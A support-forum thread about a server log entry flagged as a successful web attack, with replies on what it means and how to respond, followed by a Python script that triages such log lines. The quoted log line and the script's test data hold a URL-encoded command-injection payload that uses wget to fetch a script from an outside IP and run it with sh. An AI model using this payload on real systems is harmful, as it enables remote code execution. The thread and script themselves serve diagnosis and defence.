A web attack returned code 200 (success).

  • wowon01
    Junior Member
    Forum Explorer
    • Mar 2021
    • 18

    #1

    A web attack returned code 200 (success).

    Hi there,

    I've seen a couple of these in IM logs:

    Code:
    A web attack returned code 200 (success).
    
    6
    
    block
    
    79.10.148.140 - - [29/Jun/2018:19:45:52 -0600] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 200 20822 "-" "Hello, World" WL:"0" "-" XFF:"-"
    What does it mean when it says: A web attack returned code 200 (success)?

    thx
    G
  • kobiidykhata
    Member
    • Apr 2017
    • 94

    #2
    Hello! This rule doesn't work correctly - it works on requests to Captcha. Therefore, we will rewrite or remove it soon.
    Thank you!


    • kobiidykhata
      Member
      • Apr 2017
      • 94

      #3
      IMHO, it means that the server has probably been hacked. Look for the file "/tmp/r" and any possible related processes.

      More info: https://www.exploit-db.com/exploits/44760/


      • kobiidykhata
        Member
        • Apr 2017
        • 94

        #4
        Hello! This particular request doesn't trigger a blocking rule, though it is being spotted by 3 generic rules from i360_1_generic.conf. Please take into consideration that in order to be blocked, a request pattern should be present in strict rule sets (blocking rules), but it doesn't, based on the 200 response. You can try to activate Proactive Defense (and turn Kill mode on), whose logic is based on an advanced heuristic mechanism rather than on pattern matching. With this mode enabled the aforementioned request will be 100% blocked (checked!).

        Comment
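A triage sketch for the log line in post #1, added here as an example and not part of the thread or of the product's rule set: it URL-decodes each request, flags shell-command patterns, and lists the temp-file paths named in the request so the check suggested in post #3 can be targeted. The regexes and the names `triage` and `scan` are assumptions chosen for illustration.

```python
import re
from urllib.parse import unquote

# Access-log layout of the line quoted in post #1; trailing fields are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)
# Assumed heuristic: shell separator followed by a downloader or shell, or "$(".
CMD_RE = re.compile(r'[;|`]\s*(?:wget|curl|sh|bash)\s|\$\(', re.I)
# Paths under world-writable temp directories named in the decoded request.
TMP_RE = re.compile(r'/(?:tmp|var/tmp|dev/shm)/[\w.\-]+')

def triage(line):
    """Return a finding for a request carrying a shell-command pattern, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote(m['target'])  # %20, %27, %3E become space, quote, '>'
    if not CMD_RE.search(decoded):
        return None
    status = int(m['status'])
    return {
        'ip': m['ip'],
        'status': status,
        # 2xx: the request was answered rather than blocked. It does not by
        # itself show that the command ran, so the host still has to be checked.
        'served': 200 <= status < 300,
        'paths_to_check': sorted(set(TMP_RE.findall(decoded))),
    }

def scan(lines):
    """Triage every line and keep only the findings."""
    return [f for f in map(triage, lines) if f]

# Log line from post #1.
PAGE_LINE = ('79.10.148.140 - - [29/Jun/2018:19:45:52 -0600] "GET /login.cgi'
             '?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r'
             ';sh%20/tmp/r%27$ HTTP/1.1" 200 20822 "-" "Hello, World" '
             'WL:"0" "-" XFF:"-"')
# Constructed variants: the same request answered with 403, and a benign login.
BLOCKED = PAGE_LINE.replace('" 200 20822', '" 403 512')
BENIGN = ('198.51.100.20 - - [29/Jun/2018:19:46:01 -0600] '
          '"GET /login.cgi?cli=admin HTTP/1.1" 200 1043 "-" "Mozilla/5.0"')

if __name__ == '__main__':
    for finding in scan([PAGE_LINE, BLOCKED, BENIGN]):
        print(finding)
```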
